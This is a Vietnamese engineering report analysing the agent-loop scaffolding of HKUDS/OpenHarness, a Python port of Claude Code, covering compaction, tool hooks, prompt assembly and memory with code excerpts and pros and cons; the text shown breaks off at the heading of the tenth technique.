Tất cả báo cáo

HKUDS/OpenHarness — Nghiên cứu sâu các kỹ thuật Harness

Phân tích chi tiết scaffolding agent-loop trong HKUDS/OpenHarness — "Open-source Python port of Claude Code" kèm bộ ohmo personal agent tích hợp Feishu/Slack/Telegram/Discord. 30 kỹ thuật, kèm code thật từ repo, pros/cons và bài viết tham khảo.
Ngày: 2026-04-20Tác giả: Nghĩa & CoworkRepo: HKUDS/OpenHarnessCommit analyzed: main branch · v0.1.7 · ~30k LOC Python

1. Tổng quan OpenHarness Intro

HKUDS/OpenHarness là một implementation Python open-source mô phỏng (và mở rộng) kiến trúc của Claude Code. Self-description ngắn trong pyproject.toml: "Open-source Python port of Claude Code - an AI-powered CLI coding assistant". Repo publish hai CLI chính: openharness/oh/openh cho coding agent, và ohmo cho personal agent tích hợp messaging.

Báo cáo này phân tích harness của OpenHarness — các lớp "scaffolding" xoay quanh LLM call để biến một model trần thành một coding agent có thể chạy trong terminal, điều phối subagents, xử lý channel messaging, và tự động chạy CI. Scope gồm 7 chủ đề với 15+ subsystem:

  • engine/ — agent loop (query.py 805 LOC), stream events, cost tracker
  • tools/ — 42 tools (Bash, Read, Edit, Grep, WebFetch, Task...) + Pydantic base
  • permissions/ — 3-mode checker, sensitive path protection, path rules
  • hooks/, plugins/, skills/, mcp/ — 4 extension surfaces
  • memory/, prompts/ — per-project memory + multi-layer system prompt
  • swarm/, coordinator/ — subprocess multi-agent với git worktree + mailbox (unique vs opencode)
  • channels/, services/, sandbox/, tasks/, autopilot/ — Slack/Feishu/Telegram/Discord bus, LSP AST, Docker sandbox, cron, repo autopilot (unique vs opencode)

Harness là gì?

Cộng đồng coding-agent đang dần dùng thuật ngữ "harness" như một shorthand cho tất cả những gì không phải model — tức là: Agent = Model + Harness. Harness engineering là subset của context engineering, xoay quanh việc quản lý context window, tool orchestration, state persistence, error recovery, verification, safety, và lifecycle.

Điểm khác biệt OpenHarness: So với opencode (TypeScript fork của sst/opencode) vốn xoay quanh một single-process agent, OpenHarness mở rộng sang "agent organization" — nhiều agent subprocess có mailbox, worktree, channel riêng, được điều phối bởi một coordinator YAML-based. Nó không chỉ là một coding agent; nó là một runtime cho nhiều coding agent chạy song song.

Kiến trúc tổng thể

┌──────────────────────────────────────────────────────────────────────────────┐ │ User CLI (Typer) │ Channels (Slack, Feishu, Discord, Telegram) │ └────────────┬──────────────┴──────────────────────────┬───────────────────────┘ │ │ ▼ ▼ ┌────────────────────┐ ┌─────────────────────────┐ │ engine/query.py │ ◀─── inbox ── │ swarm/mailbox (file) │ │ run_query loop │ │ swarm/subprocess_backend│ │ async ReAct │ └────────┬────────────────┘ └────┬───────────────┘ │ │ │ │ stream events │ coordinator spawns ▼ │ ┌────────────────────┐ ▼ │ stream_events.py │ ┌────────────────────────┐ │ 7 event types │ │ Subagent subprocess │ │ + CompactProgress │ │ (git worktree isolated)│ └────┬───────────────┘ └────────────────────────┘ │ │ ┌─────▼──────┐ ┌──────▼──────┐ ┌──────────▼────────────┐ │ tools/ │ │ permissions/│ │ mcp/client/manager │ │ 42 tools │ │ checker │ │ stdio + HTTP transport│ │ Pydantic │ │ 6-layer eval│ └──────────┬────────────┘ │ schema │ │ sensitive │ │ └────┬───────┘ │ path block │ ┌─────────▼──────────┐ │ └─────────────┘ │ services/lsp │ │ │ (Python AST) │ ┌────▼──────────┐ ┌──────────────┐ │ services/cron │ │ hooks/executor│ │ memory/ │ │ sandbox/docker │ │ 4 hook types │ │ per-project │ └─────────────────────┘ │ 6 events │ │ MEMORY.md │ │ hot reload │ │ SHA1 hash │ └───────────────┘ └──────────────┘

Tech stack

LayerCông nghệGhi chú
RuntimePython ≥3.10asyncio toàn bộ, Pydantic v2 strict
LanguagePythonmypy strict, ruff lint (line 100)
AI SDKsAnthropic ≥0.40 + OpenAI ≥1.0Provider abstraction qua api_client
CLITyper ≥0.12Subcommand layout
TUIRich + Textual ≥0.80 + React InkDual TUI: Python native + React-based
ValidationPydantic v2Tool input models sinh JSON schema
HTTPhttpx ≥0.27 + websockets ≥12Async; Feishu WebSocket long-connection
MCPmcp ≥1.0 (Python SDK)stdio + HTTP transport
Channelsslack-sdk, discord.py, python-telegram-bot, lark-oapi4 bot SDKs first-class
Croncroniter ≥2.0 + watchfilesPersistent job scheduler
SandboxDocker SDK (optional)Tool execution isolation

Bảng tóm tắt 30 kỹ thuật

ID Kỹ thuật Theme
T1 Async ReAct + branching single/parallel tool execution Loop
T2 Auto-compact before-turn + reactive on overflow Loop
T3 Stream events union + CompactProgressEvent 9-phase Loop
T4 Pre/Post tool hook interception Loop
T5 Tool metadata carryover across turns Loop
T6 Multi-layer system prompt assembly (9 sections) Context
T7 CLAUDE.md cascading discovery upward Context
T8 Per-project memory isolation (SHA1 hash) Context
T9 Token-based memory search + CJK tokenizer Context
T10 Pydantic tool base + auto JSON schema Tool
T11 Per-tool output truncation + UTF-8 normalization Tool
T12 Bash interactive preflight + PTY + graceful timeout Tool
T13 Ripgrep-first Glob/Grep + Python fallback Tool
T14 Markdown skill system + frontmatter Ecosystem
T15 Hook lifecycle (6 events · 4 types · hot reload) Ecosystem
T16 Plugin manifest-based loading Ecosystem
T17 MCP stdio + HTTP + dynamic Pydantic adapter Ecosystem
T18 3-mode permission (DEFAULT / PLAN / FULL_AUTO) Permission
T19 Built-in sensitive path protection (hardcoded glob) Permission
T20 6-layer hierarchical permission evaluation Permission
T21 Async interactive approval + UUID + 300s timeout Permission
T22 Subprocess-based subagent spawning Swarm ★
T23 File-based async mailbox với atomic writes Swarm ★
T24 Dual-channel permission sync protocol Swarm ★
T25 Git worktree isolation per agent Swarm ★
T26 YAML agent definitions + coordinator Swarm ★
T27 Multi-channel bus (Slack/Feishu/Discord/Telegram/Matrix) Integrations ★
T28 LSP-based code intelligence via Python AST Integrations ★
T29 Docker sandbox cho tool execution Integrations ★
T30 Cron scheduler + persistent background tasks Integrations ★

★ = feature chỉ có ở OpenHarness (không có ở opencode core). Tổng: 9 kỹ thuật unique, 21 kỹ thuật chia sẻ chung ý tưởng với opencode/Claude Code nhưng implement theo Python idiom.

A. Agent Loop & Streaming 5 kỹ thuật

Engine là trung tâm harness của OpenHarness: file engine/query.py (805 LOC) chứa coroutine run_query — một async generator emit stream events cho UI. Điểm thú vị: loop branch giữa sequential (1 tool) và parallel (2+ tool via asyncio.gather), auto-compact ngay trước mỗi turn, pre/post tool hook intercept, và carryover tool metadata qua nhiều lần compact.

T1. Async ReAct loop với single/parallel tool branching

A.1
File: src/openharness/engine/query.py · Hàm: run_query() · Lines: 516–651

Code từ OpenHarness

turn_count
      = 0 while
      context.max_turns is None or turn_count < context.max_turns: turn_count +=
      1 # --- auto-compact check
      before calling the model --------------- async
      for event, usage in
      _stream_compaction(trigger="auto"): yield event, usage messages, was_compacted =
      last_compaction_result final_message: ConversationMessage | None = None async for event in
      context.api_client.stream_message( ApiMessageRequest(model=context.model,
      messages=messages, system_prompt=context.system_prompt,
      tools=context.tool_registry.to_api_schema()): if
      isinstance(event, ApiTextDeltaEvent): yield
      AssistantTextDelta(text=event.text), None elif isinstance(event, ApiMessageCompleteEvent):
      final_message = event.message if not
      final_message.tool_uses: return # natural end of turn tool_calls =
      final_message.tool_uses if len(tool_calls) ==
      1: # Single tool: sequential
      (stream events immediately) tc = tool_calls[0] yield
      ToolExecutionStarted(tool_name=tc.name, tool_input=tc.input), None result = await
      _execute_tool_call(context, tc.name, tc.id, tc.input) yield ToolExecutionCompleted(tool_name=tc.name,
      output=result.content, is_error=result.is_error), None tool_results = [result] else: # Multiple tools: execute
      concurrently, emit events after for tc
      in tool_calls: yield
      ToolExecutionStarted(tool_name=tc.name, tool_input=tc.input), None # return_exceptions=True tránh
      orphan tool_use blocks raw_results = await
      asyncio.gather( *[_run(tc) for tc in tool_calls], return_exceptions=True ) # wrap exceptions thành
      ToolResultBlock(is_error=True) ...
      messages.append(ConversationMessage(role="user",
      content=tool_results))
Tại sao quan trọng: Hầu hết harness Python đơn giản chạy tool sequential để dễ quản lý state. OpenHarness branching: khi chỉ có 1 tool thì emit event realtime (UX mượt), khi nhiều tool thì asyncio.gather để giảm latency. Quan trọng nhất là return_exceptions=True: nếu một tool raise, các tool khác không bị cancelled. Lý do được comment rất kỹ: Anthropic API reject request tiếp theo nếu có bất kỳ tool_use nào thiếu tool_result tương ứng.

Code example (generic)

async
      def run_agent_turn(messages, tools): resp =
      await llm.call(messages, tools) if not resp.tool_uses: return
      resp if len(resp.tool_uses) == 1: tc = resp.tool_uses[0]
      results = [await exec_tool(tc)] else: # CRITICAL:
      return_exceptions=True # otherwise failed tool
      leaves siblings cancelled # → orphan tool_use
      blocks → next API call rejected raw = await
      asyncio.gather( *[exec_tool(tc) for tc in resp.tool_uses], return_exceptions=True, ) results = [wrap_exception(tc, r) for tc, r in zip(resp.tool_uses,
      raw)] messages.append({"role": "user", "content": results})
      return results
Ưu điểm
  • Parallel giảm latency khi nhiều tool độc lập (Read 3 files cùng lúc)
  • Single path vẫn stream event realtime — UX không bị delay
  • return_exceptions=True bảo vệ khỏi orphan tool_use bug
  • async-native, không cần thread pool
Nhược điểm
  • Parallel race condition nếu tool cùng sửa file — không enforce ordering
  • Unbounded concurrency khi nhiều tool call → overload disk/API
  • Ẩn side effect khó debug khi tool đan xen
  • Không có mechanism cancel/timeout toàn turn như opencode Effect.Stream

T2. Auto-compact before-turn + reactive on overflow

A.2
File: src/openharness/engine/query.py · Lines: 519–562 · Service: services/compact/ · Hằng: AUTOCOMPACT_BUFFER_TOKENS = 13_000

Code từ OpenHarness

# 1. Before-turn
      auto-compact async for event, usage in _stream_compaction(trigger="auto"): yield event, usage
      messages, was_compacted = last_compaction_result # 2.
      Reactive compact khi provider trả prompt-too-long except Exception as exc:
      error_msg = str(exc) if not
      reactive_compact_attempted and
      _is_prompt_too_long_error(exc): reactive_compact_attempted = True yield
      StatusEvent(message=REACTIVE_COMPACT_STATUS_MESSAGE), None async for event, usage
      in _stream_compaction(trigger="reactive", force=True): yield event, usage messages, was_compacted =
      last_compaction_result if was_compacted: continue # retry turn với messages đã
      compact # 3. services/compact/microcompact.py —
      cheap, fast first pass # Drop stale
      ToolResultBlock content (keep tool_use structure) # 4. services/compact/summary.py — LLM summarize khi
      microcompact không đủ # 5.
      services/compact/ptl_retry.py — truncate_head_for_ptl_retry() # last-chance cắt head khi reactive vẫn
      overflow
Tại sao quan trọng: Ba tầng compaction phòng vệ: (1) proactive — trước mỗi turn ước lượng token, nếu gần giới hạn chạy microcompact xóa tool_result cũ; (2) reactive — khi API trả 400 "prompt too long", retry với LLM summary; (3) last-resort — nếu vẫn overflow, truncate head messages. Điều này giúp session dài (hàng trăm turn) không bị die. Buffer 13k tokens là "đệm" cho response + tool output của turn kế.

Code example (generic)

class CompactionOrchestrator:
      async def maybe_compact(self, messages, trigger="auto"): estimate =
      self.token_counter.estimate(messages) if estimate
      < self.threshold: return messages, False # Phase 1: cheap — drop old
      ToolResultBlock content only pruned = self.microcompact(messages)
      if self.token_counter.estimate(pruned) <
      self.threshold: return pruned, True # Phase 2: expensive — LLM
      summarize summary = await
      self.llm_summarize(pruned) return [system_prompt,
      summary] + pruned[-5:], True async def run_turn(self, messages): messages, _ = await self.maybe_compact(messages) try: return await
      llm.call(messages) except PromptTooLongError:
      messages, _ = await self.maybe_compact(messages,
      trigger="reactive") return
      await llm.call(messages) # one
      retry
Ưu điểm
  • Ba-tầng graceful — rẻ trước, đắt sau
  • Session dài tự survive mà không cần user can thiệp
  • Reactive fallback nếu token estimate sai
  • Event progress để UI show đang compact
Nhược điểm
  • LLM summary rủi ro mất thông tin quan trọng
  • 13k buffer arbitrary — không tune theo model
  • Truncate head có thể xóa system hint / CLAUDE.md context
  • Khi reactive fail lần 2, agent die (không có fallback thứ 3)

T3. Streaming events union + CompactProgressEvent 9-phase

A.3
File: src/openharness/engine/stream_events.py · Lines: toàn bộ file

Code từ OpenHarness

from dataclasses
      import dataclass from typing import
      Literal, Union # 7 event types yielded from
      run_query() @dataclass(frozen=True) class AssistantTextDelta:
      text: str @dataclass(frozen=True) class AssistantTurnComplete:
      message: ConversationMessage; usage: UsageSnapshot @dataclass(frozen=True) class
      ToolExecutionStarted: tool_name: str;
      tool_input: dict @dataclass(frozen=True) class ToolExecutionCompleted:
      tool_name: str; output: object; is_error: bool @dataclass(frozen=True) class
      StatusEvent: message: str @dataclass(frozen=True) class
      ErrorEvent: message: str @dataclass(frozen=True) class
      CompactProgressEvent: phase: Literal[ "hooks_start", "context_collapse_start", "context_collapse_end", "session_memory_start", "session_memory_end", "compact_start", "compact_retry", "compact_end", "compact_failed", ] message: str StreamEvent = Union[
      AssistantTextDelta, AssistantTurnComplete, ToolExecutionStarted,
      ToolExecutionCompleted, StatusEvent, ErrorEvent, CompactProgressEvent,
      ]
Tại sao quan trọng: Thay vì union mơ hồ dict[str, Any], OpenHarness dùng tagged union với @dataclass(frozen=True). UI bên Rich/Textual pattern-match bằng isinstance() cho từng event type — mypy strict đảm bảo không bỏ sót case. Event đặc biệt nhất là CompactProgressEvent với 9 phase: UI hiện progress bar chi tiết (đang collapse context → đang save memory → đang summarize → done/fail) thay vì chỉ "compacting...". Mức độ observability này trong bản port Python rất hiếm.

Code example (generic)

from typing import Union, Literal from dataclasses import dataclass @dataclass(frozen=True) class
      TextDelta: text: str @dataclass(frozen=True) class
      ToolStart: tool: str; input: dict @dataclass(frozen=True) class
      ToolEnd: tool: str; output: str; error: bool
      Event = Union[TextDelta, ToolStart, ToolEnd] async
      def render_events(gen): async for ev in gen: match ev:
      case TextDelta(text): console.print(text,
      end="") case
      ToolStart(tool, _): ui.mark_tool(tool, "running")
      case ToolEnd(tool, _, error): ui.mark_tool(tool,
      "error" if error else "done")
Ưu điểm
  • Type-safe: mypy strict bắt bỏ sót case
  • UI logic tách rời khỏi engine
  • CompactProgressEvent 9-phase → UX chi tiết lúc compact
  • Dễ serialize sang JSON cho remote UI
Nhược điểm
  • Thêm event type cần cập nhật nhiều chỗ (engine + UI + tests)
  • Frozen dataclass immutable → không "accumulate" được (phải tạo object mới mỗi delta)
  • Không có ID liên kết parent-child event (tool_start ↔ tool_end phải match bằng tool_name)

T4. Pre/Post tool hook interception

A.4
File: src/openharness/engine/query.py · Hàm: _execute_tool_call() · Lines: 654–720

Code từ OpenHarness

async def
      _execute_tool_call( context: QueryContext,
      tool_name: str, tool_use_id: str, tool_input: dict[str, object], ) ->
      ToolResultBlock: # ---- PRE_TOOL_USE hook ----
      if context.hook_executor is not
      None: pre_hooks = await
      context.hook_executor.execute( HookEvent.PRE_TOOL_USE, {"tool_name": tool_name, "tool_input": tool_input, "event": HookEvent.PRE_TOOL_USE.value}, ) if pre_hooks.blocked: return
      ToolResultBlock( tool_use_id=tool_use_id, content=pre_hooks.reason or f"pre_tool_use hook blocked {tool_name}", is_error=True, ) # ---- Actual tool execution
      ---- result = await
      context.tool_registry.execute(tool_name, tool_input, ...) # ---- POST_TOOL_USE hook (observation only, cannot block)
      ---- if context.hook_executor is not None: await
      context.hook_executor.execute( HookEvent.POST_TOOL_USE, {"tool_name": tool_name, "tool_input": tool_input, "tool_result": result.content, "is_error": result.is_error}, ) return result
Tại sao quan trọng: Hook cho phép user/plugin inject policy ngoài permission system — ví dụ: chặn git push sau 6pm, log bash vào SIEM, validate Edit pattern. PRE hook có thể blocked=True → short-circuit thành ToolResultBlock error (LLM thấy như tool fail bình thường, tự điều chỉnh). POST hook chỉ observe — không thể undo execution đã xong. Thiết kế này giống Claude Code hooks (tham chiếu code.claude.com/docs/en/hooks).

Code example (generic)

class HookExecutor: async def execute(self, event: HookEvent, payload: dict) ->
      HookResult: blocked = False; reason = None for hook in self.hooks.get(event, []): res = await hook.run(payload) if
      res.blocked: blocked = True; reason = res.reason;
      break return
      HookResult(blocked=blocked, reason=reason) # Usage
      inside tool execution async def run_tool(name, args): pre = await hooks.execute(HookEvent.PRE_TOOL_USE, {"tool_name": name, "args":
      args}) if pre.blocked: return {"error": pre.reason
      or "blocked by hook"}
      result = await tool.execute(args) await hooks.execute(HookEvent.POST_TOOL_USE, {"tool_name": name, "result":
      result}) return result
Ưu điểm
  • Policy tách khỏi permission system — hai layer bảo vệ
  • PRE có thể block; POST có thể audit/log
  • Hot-reload hooks qua HookReloader watch mtime
  • Shell/Prompt/HTTP/Agent types — đa dạng
Nhược điểm
  • Hook chạy sync trong hot path → latency mỗi tool
  • Prompt hook gọi LLM → cost + race với main loop
  • Không có "retry with modified args" — chỉ block or pass
  • Hook mis-config có thể làm agent stuck mà khó debug

T5. Tool metadata carryover across turns

A.5
File: src/openharness/engine/query.py · Lines: 146–250 · Struct: QueryContext (deque-based tracking)

Code từ OpenHarness

from collections
      import deque @dataclass class QueryContext: # Recent work tracking — persisted across compaction
      rounds recent_goals: deque[str] = field(default_factory=lambda: deque(maxlen=5))
      recent_reads: deque[str] = field(default_factory=lambda: deque(maxlen=6))
      active_artifacts: deque[str] = field(default_factory=lambda: deque(maxlen=8))
      async_agent_tasks: deque[AgentTaskRef] = field(default_factory=lambda: deque(maxlen=12))
      work_log: deque[WorkLogEntry] = field(default_factory=lambda: deque(maxlen=10)) ...
      # Updated on every ToolExecutionCompleted: def record_tool_execution(ctx:
      QueryContext, tc: ToolUseBlock, result: ToolResultBlock): if tc.name == "Read": path =
      tc.input.get("file_path") if path: ctx.recent_reads.append(path) elif tc.name == "Write" or tc.name == "Edit": path =
      tc.input.get("file_path") if path: ctx.active_artifacts.append(path) elif tc.name == "Task":
      ctx.async_agent_tasks.append(AgentTaskRef(id=..., status="pending"))
      ctx.work_log.append(WorkLogEntry(tool=tc.name, ts=time.time(), ok=not result.is_error)) # When compact
      happens, these deques get injected into summary: # "Recently read: path1, path2, ..." # "Active artifacts: draft.md, report.html, ..." # "Pending subagents: task-abc (status=running),
      ..."
Tại sao quan trọng: Khi compact xảy ra, messages cũ bị drop nhưng deque carryover sống sót. Lần call tiếp theo, summary prompt chèn: "Agent đã đọc X, đang sửa Y, có task Z đang chạy". Điều này giải quyết nỗi đau lớn nhất của compaction: agent "mất trí nhớ" về công việc đang làm. Mỗi deque có maxlen nhỏ (5, 6, 8, 10, 12) → bounded, không tự overflow.

Code example (generic)

from collections import deque class AgentMemory: def __init__(self):
      self.recent_goals = deque(maxlen=5)
      self.recent_reads = deque(maxlen=6)
      self.pending_tasks = deque(maxlen=12) def on_tool(self, name, args,
      ok): if name == "Read":
      self.recent_reads.append(args["file_path"]) elif name == "Task":
      self.pending_tasks.append(args["id"]) def summary_block(self) ->
      str: return ( f"Recent files read: {', '.join(self.recent_reads)}\n"
      f"Active artifacts: {',
      '.join(self.active_artifacts)}\n" f"Pending subagents: {', '.join(self.pending_tasks)}" )
      # Inject into compact summary prompt: compact_msg
      = f"Previous conversation summary:
      ...\n\n{memory.summary_block()}"
Ưu điểm
  • Giảm "amnesia" sau compact
  • Bounded deque → predictable memory
  • Metadata structural → easy to render in UI
  • Có thể inject vào system prompt mỗi turn (không chỉ khi compact)
Nhược điểm
  • Tracking logic hard-code theo từng tool — cần update khi thêm tool
  • Không có "why" chỉ có "what" — agent biết đọc X nhưng không nhớ lý do
  • Deque maxlen arbitrary — session rất dài vẫn overflow
  • Có thể trùng lặp info với LLM-generated summary

B. Context & Memory 4 kỹ thuật

OpenHarness tách context thành 3 lớp: (1) system prompt — assemble động mỗi turn từ 9 section; (2) CLAUDE.md — rules local theo project, cascade từ cwd lên root; (3) persistent memory — file-based note per-project, được search theo query hiện tại. Điểm khác opencode: OpenHarness có long-term memory store riêng (MEMORY.md) trong khi opencode chỉ dựa AGENTS.md/CLAUDE.md.

T6. Multi-layer system prompt assembly (9 sections)

B.1
File: src/openharness/prompts/context.py · Hàm: build_system_prompt() · Lines: 74–158

Code từ OpenHarness

def build_system_prompt(ctx: PromptContext) -> str:
      sections: list[str] = [] # 1. Base role — persona +
      operating principles sections.append(BASE_PROMPT) # 2. Environment — cwd, platform, python, git branch,
      model sections.append(_build_env_section(ctx)) #
      3. Effort + reasoning passes (thinking mode hint) if ctx.effort:
      sections.append(_build_effort_section(ctx.effort, ctx.passes)) # 4. Skills — discovered skills injected như
      "tools-of-tools" if ctx.skills:
      sections.append(_build_skills_section(ctx.skills)) # 5.
      Delegation — khi có subagents if
      ctx.subagent_definitions:
      sections.append(_build_delegation_section(ctx.subagent_definitions)) # 6. CLAUDE.md — cascading from cwd to root if ctx.claudemd_content: sections.append(f"# Local project rules
      (CLAUDE.md)\n{ctx.claudemd_content}") # 7. Local
      rules (.claude/rules/*.md) if
      ctx.local_rules: sections.append(_build_local_rules(ctx.local_rules))
      # 8. Issue/PR context (khi chạy trong GitHub
      autopilot) if ctx.issue_or_pr:
      sections.append(_build_issue_section(ctx.issue_or_pr)) #
      9. Relevant memories (top-k from memory search) if ctx.relevant_memories:
      sections.append(_build_memories_section(ctx.relevant_memories)) return "\n\n---\n\n".join(sections)
Tại sao quan trọng: Prompt không phải static — rebuild atomic mỗi turn. Khi user chuyển sang file khác, ctx.claudemd_content đổi → prompt đổi. Khi memory search hit mới → memories section khác. Cache-aware: các section ổn định (1-5) ở đầu, section dễ thay đổi (6-9) ở cuối → Anthropic prefix caching vẫn hit cho phần đầu, chỉ invalidate phần cuối.

Code example (generic)

@dataclass class PromptContext: cwd:
      Path; model: str; effort: str | None
      claudemd_content: str | None subagent_definitions:
      list[AgentDef] relevant_memories: list[MemoryHeader] def build_system_prompt(ctx:
      PromptContext) -> str: parts = [ BASE_ROLE, # 1.
      stable build_env(ctx), # 2. stable per
      session build_effort(ctx.effort), # 3. stable per
      mode build_subagents(ctx.subagent_definitions), #
      4. stable build_claudemd(ctx.claudemd_content), #
      5. changes when cwd changes build_memories(ctx.relevant_memories),
      # 6. changes every turn ] return "\n\n---\n\n".join(p
      for p in parts if p)
Ưu điểm
  • Modular — mỗi section có thể test độc lập
  • Cache-aware ordering (stable đầu, dynamic cuối)
  • Điều kiện rõ ràng — skip section khi không có data
  • Delimiter --- giúp LLM parse section boundaries
Nhược điểm
  • 9 section → system prompt có thể rất dài (10k+ token)
  • Rebuild mỗi turn → prompt caching fragile nếu cache key không stable
  • Không có token budget per section — dễ dominate bởi CLAUDE.md lớn
  • Thứ tự section hard-code, khó customize

T7. CLAUDE.md cascading discovery upward

B.2
File: src/openharness/prompts/claudemd.py · Hàm: discover_claudemd() · Lines: 8–48 · Truncate: 12000 chars/file

Code từ OpenHarness

def discover_claudemd(cwd: Path, *, max_chars: int = 12000) -> str: collected: list[tuple[Path, str]] =
      [] seen: set[Path] = set() # Walk upward from cwd to
      filesystem root current = cwd.resolve() while
      True: for candidate in ( current / "CLAUDE.md",
      current / ".claude" / "CLAUDE.md", ): if
      candidate.exists() and candidate not in seen: seen.add(candidate) content =
      candidate.read_text(encoding="utf-8",
      errors="replace") if
      len(content) > max_chars: content = content[:max_chars] + f"\n\n... [truncated at {max_chars}
      chars]" collected.append((candidate, content)) #
      Also collect .claude/rules/*.md at each level rules_dir = current /
      ".claude" / "rules"
      if rules_dir.is_dir(): for
      rule in sorted(rules_dir.glob("*.md")): if rule not in seen: seen.add(rule) collected.append((rule,
      rule.read_text(...))) if current.parent ==
      current: break # reached
      root current = current.parent # Reverse so
      root-level rules come first, leaf rules last (last wins)
      collected.reverse() return "\n\n".join(f"## {p.relative_to(cwd) if ...}\n\n{c}" for p, c in
      collected)
Tại sao quan trọng: Monorepo có CLAUDE.md ở root (rules chung) + sub-package level (rules chuyên biệt). Walk upward + dedup by path đảm bảo không bỏ sótkhông trùng lặp. Reverse cuối cùng để leaf rules (gần cwd) override root rules — pattern "last wins" giống .gitignore. Truncate 12k chars/file tránh một file rules khổng lồ nuốt cả prompt budget.

Code example (generic)

def find_up(cwd: Path, filenames: list[str]) ->
      list[Path]: """Walk upward from cwd to root, collecting
      matching files.""" found, seen = [], set()
      current = cwd.resolve() while True: for name in filenames: p =
      current / name if p.exists() and p not in seen: seen.add(p);
      found.append(p) if current.parent == current:
      break current = current.parent return found def assemble_rules(cwd: Path) -> str: files =
      find_up(cwd, ["CLAUDE.md", ".claude/CLAUDE.md", "AGENTS.md"]) # Root-first so leaf
      overrides (last-wins) files.reverse() return "\n\n".join(f.read_text()[:12000] for f in files)
Ưu điểm
  • Monorepo-friendly — rule theo sub-package
  • Dedup by path — CLAUDE.md + .claude/CLAUDE.md không trùng
  • Truncate per file → predictable size
  • Last-wins giống .gitignore — mental model quen thuộc
Nhược điểm
  • Walk đến root có thể đọc file ngoài dự án (home dir)
  • Không merge semantic — chỉ concat
  • Truncate cắt giữa câu, có thể corrupt markdown
  • Không tôn trọng .gitignore cho rules dir

T8. Per-project memory isolation với SHA1 hash

B.3
File: src/openharness/memory/paths.py · Hàm: get_project_memory_dir() · Lines: 11–22

Code từ OpenHarness

from
      hashlib import sha1 from
      pathlib import Path from
      openharness.config.paths import get_data_dir def get_project_memory_dir(cwd:
      str | Path) -> Path: """Return the persistent memory
      directory for a project.""" path = Path(cwd).resolve() digest =
      sha1(str(path).encode("utf-8")).hexdigest()[:12]
      memory_dir = get_data_dir() / "memory" / f"{path.name}-{digest}"
      memory_dir.mkdir(parents=True, exist_ok=True) return memory_dir def get_memory_entrypoint(cwd:
      str | Path) -> Path: """Return the project memory
      entrypoint file.""" return
      get_project_memory_dir(cwd) / "MEMORY.md" # Result:
      ~/.openharness/memory/{project-name}-{sha1[:12]}/ # ├── MEMORY.md ← entrypoint (index) # ├── architecture.md ← topic memory # ├── api-design.md # └──
      ...
Tại sao quan trọng: Hai project cùng tên (vd hai clone repo app) ở path khác nhau sẽ không trộn memory. SHA1 của absolute path → unique nhưng vẫn readable vì tên dir chứa cả path.name. File-based (không DB) → portable, user có thể backup/copy/inspect bằng tay. MEMORY.md là index file — các topic khác link vào từ đó (giống Obsidian vault).

Code example (generic)

from hashlib import sha1 from pathlib import Path def project_memory_dir(cwd:
      Path, data_root: Path) -> Path: """Stable,
      collision-resistant dir per project path.""" abs_path =
      cwd.resolve() digest = sha1(str(abs_path).encode()).hexdigest()[:12] d = data_root / "memory" /
      f"{abs_path.name}-{digest}" d.mkdir(parents=True, exist_ok=True) return d # Usage mem_dir =
      project_memory_dir(Path.cwd(), Path.home() / ".myagent") # →
      ~/.myagent/memory/app-a3f8b7c1d2e5/
Ưu điểm
  • Zero collision giữa các project cùng tên
  • Readable — dir có chứa tên project
  • File-based → backup/version trivial
  • Lazy mkdir — không tạo until needed
Nhược điểm
  • Đổi path dự án (mv /a → /b) → memory "mất" vì hash đổi
  • SHA1 không cần crypto-strength ở đây nhưng chọn để đơn giản — dev mới có thể nghĩ "ai tấn công?"
  • 12 chars digest có thể collide (1 trong ~10^14) trên hệ rất lớn
  • Dir tên project có thể lộ info nhạy cảm

T9. Token-based memory search với CJK support

B.4
File: src/openharness/memory/search.py · Hàm: find_relevant_memories() · Lines: 12–49

Code từ OpenHarness

def find_relevant_memories(query: str, cwd, *,
      max_results=5) -> list[MemoryHeader]: tokens =
      _tokenize(query) if not tokens: return [] scored: list[tuple[float, MemoryHeader]] = []
      for header in
      scan_memory_files(cwd, max_files=100): meta =
      f"{header.title}
      {header.description}".lower() body = header.body_preview.lower()
      # Metadata matches weighted 2x; body matches 1x.
      meta_hits = sum(1 for t in tokens if t in meta) body_hits = sum(1 for t in tokens if t in body) score = meta_hits
      * 2.0 + body_hits if
      score > 0: scored.append((score, header))
      # Rank by score desc, then recency desc
      (tie-break) scored.sort(key=lambda item:
      (-item[0], -item[1].modified_at)) return [header
      for _, header in
      scored[:max_results]] def _tokenize(text: str) -> set[str]: """Extract search tokens, handling ASCII + Han
      ideographs.""" # ASCII word tokens (3+ chars) —
      filter out stopwords like "the" ascii_tokens = {t for t in re.findall(r"[A-Za-z0-9_]+", text.lower())
      if len(t) >= 3} # Han ideographs (each character carries independent
      meaning) han_chars = set(re.findall(r"[\u4e00-\u9fff\u3400-\u4dbf]", text)) return ascii_tokens | han_chars
Tại sao quan trọng: Không phải embedding, không phải BM25 full — chỉ token overlap scoring. Đủ tốt cho repo <100 memory file, zero infra (không cần vector DB). Weighted 2x cho frontmatter (title/description) buộc memory phải có metadata tốt. CJK-aware: mỗi Han ideograph là 1 token độc lập (Tiếng Trung không dùng space để tách từ) — quan trọng vì HKUDS là lab HongKong, memory có thể mixed Chinese/English.

Code example (generic)

import re def tokenize(text: str) -> set[str]: ascii_tok = {t for t
      in re.findall(r"\w+", text.lower()) if len(t)
      >= 3} han_tok = set(re.findall(r"[\u4e00-\u9fff]", text)) return ascii_tok | han_tok def
      rank_memories(query: str, memories, k=5): q_tokens = tokenize(query) scored = [] for m in memories: meta_hits =
      sum(1 for t in q_tokens if t in m.meta.lower())
      body_hits = sum(1 for t in q_tokens if t in m.body.lower()) score =
      meta_hits * 2.0 + body_hits if score: scored.append((score, m.modified_at, m))
      scored.sort(key=lambda t: (-t[0], -t[1])) return [m for _, _, m in scored[:k]]
Ưu điểm
  • Zero infra (không cần embedding service)
  • CJK-aware — Tiếng Trung/Nhật/Hàn work out-of-box
  • Metadata weighting thưởng memory có annotation tốt
  • Recency tie-break — memory mới ưu tiên
Nhược điểm
  • Không hiểu semantic (synonym, translation)
  • Max 100 files scanned — scale kém
  • Stopword filter đơn giản (chỉ length ≥3)
  • Vietnamese không tokenize đúng nếu có dấu

C. Tool Design 4 kỹ thuật

OpenHarness có 42 tools (tools/ folder, một file per tool). Base class Pydantic đảm bảo type-safety và auto-generate JSON schema cho Anthropic/OpenAI SDK. Mỗi tool có truncation giới hạn riêng, bash được bảo vệ bằng preflight + PTY, Glob/Grep ưu tiên ripgrep.

T10. Pydantic tool base + auto JSON schema

C.1
File: src/openharness/tools/base.py · Lines: 30–52

Code từ OpenHarness

